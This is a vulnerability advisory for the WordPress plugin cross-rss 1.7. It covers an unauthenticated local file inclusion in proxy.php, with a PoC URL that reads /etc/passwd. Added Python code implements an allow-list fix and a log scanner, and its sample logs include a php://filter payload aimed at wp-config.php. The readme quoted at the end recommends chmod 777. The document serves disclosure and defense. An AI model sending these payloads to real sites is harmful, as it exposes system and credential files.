wp-plugin : cross-rss – Local File Inclusion

 

Plugin Details

Plugin Name : cross-rss

Affected Version : 1.7 (and most probably lower versions, if any)

Vulnerability : Local File Inclusion

Identified by : Anant Shrivastava

 

 

Technical Details

Minimum Level of Access Required : Unauthenticated

Vulnerable Parameter : rss

The plugin's proxy.php fetches whatever the rss parameter names and returns it to the caller. The value is not restricted to remote http(s) feed URLs, so a local filesystem path is read and served back, and no WordPress login is needed to reach the script.

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd

A vulnerable install answers this request with the contents of /etc/passwd.
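The following is an added example, not code from the cross-rss plugin or from the advisory's author. It shows, in Python, the allow-list check a fix for this bug needs (only absolute http(s) URLs with a host may be fetched), a safe way to confirm the PoC from a captured response, and a scan over web-server access logs for the same probe. The function names, the response bodies and the log lines are all constructed for the example.

```python
"""Checks around the cross-rss proxy.php LFI (added example, not plugin code)."""
import re
from urllib.parse import parse_qs, unquote, urlparse

# PoC request quoted in the advisory.
POC_URL = "http://localhost/wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd"

# One "name:x:uid:gid:" entry per line, the shape a leaked /etc/passwd has.
PASSWD_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:", re.MULTILINE)

# Constructed response bodies: what a vulnerable install returns for the PoC,
# and a harmless feed body for comparison.
CONSTRUCTED_LEAK = ("root:x:0:0:root:/root:/bin/bash\n"
                    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
CONSTRUCTED_FEED = "<?xml version='1.0'?><rss><channel><title>ok</title></channel></rss>"

# Constructed Apache-style access log lines (hypothetical traffic, not a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [29/May/2014:10:01:02 +0000] "GET /wp-content/plugins/cross-rss/proxy.php?rss=http://example.com/file.rss HTTP/1.1" 200 8123
203.0.113.9 - - [29/May/2014:10:02:17 +0000] "GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1" 200 1903
203.0.113.9 - - [29/May/2014:10:02:40 +0000] "GET /wp-content/plugins/cross-rss/proxy.php?rss=php://filter/convert.base64-encode/resource=../../../wp-config.php HTTP/1.1" 200 5120
198.51.100.7 - - [29/May/2014:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 4311
"""
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def rss_param(url_or_path):
    """Decoded value of the rss query parameter, or None when absent."""
    values = parse_qs(urlparse(url_or_path).query, keep_blank_values=True).get("rss")
    # parse_qs decodes once; a second unquote catches double-encoded probes (%252e%252e).
    return unquote(values[0]) if values else None


def is_remote_feed_url(value):
    """Allow-list check a fix must apply before fetching: absolute http(s) URL with a host.
    Rejects plain paths, file:// and php:// wrappers, and scheme-relative //host forms."""
    if not isinstance(value, str):
        return False
    p = urlparse(value.strip())
    return p.scheme in ("http", "https") and bool(p.hostname)


def looks_like_passwd(body):
    """True when the body carries at least two passwd-style entries."""
    return len(PASSWD_LINE.findall(body)) >= 2


def classify_response(request_url, body):
    """Verdict for one proxy.php exchange: ('vulnerable' | 'blocked' | 'n/a', reason)."""
    value = rss_param(request_url)
    if value is None:
        return "n/a", "no rss parameter"
    if is_remote_feed_url(value):
        return "n/a", "remote feed URL, not an LFI probe"
    if looks_like_passwd(body):
        return "vulnerable", "local path was read back"
    return "blocked", "local path was not reflected"


def find_lfi_probes(log_text):
    """(client_ip, rss_value, status) for every proxy.php hit whose rss value is not a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        if "/cross-rss/proxy.php" not in path:
            continue
        value = rss_param(path)
        if value is not None and not is_remote_feed_url(value):
            hits.append((ip, value, int(status)))
    return hits


if __name__ == "__main__":
    print(classify_response(POC_URL, CONSTRUCTED_LEAK))
    for hit in find_lfi_probes(SAMPLE_LOG):
        print("probe:", hit)
```

The allow-list only addresses the local-file read described on this page: a proxy that fetches any http(s) URL on behalf of anonymous callers can still be pointed at internal hosts, so a real fix should also restrict destinations or require authentication.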

 

Disclosure Timeline

Vendor Contacted : 2014-02-19

Plugin Status : Closed

Public Disclosure : 2014-05-29

CVE Number : CVE-2014-4941

 
Plugin Description (from the plugin's own readme) :

Unzip the file and place the folder cross-rss, with all its files, in the wp-content/plugins directory. Go to the WordPress Admin Plugins section and activate the Cross-RSS 0.5 plugin.
Set chmod 777 on wp-content/plugins/cross-rss/cache (make it writable by webserver scripts).
Set chmod 666 on wp-content/plugins/cross-rss/proxy.log (make it writable by webserver scripts).

Usage
When creating a page or post, just place the line: [crossrss url=http://example.com/file.rss /] where http://example.com/file.rss is the full URL of the RSS feed you want to show on your WordPress page.
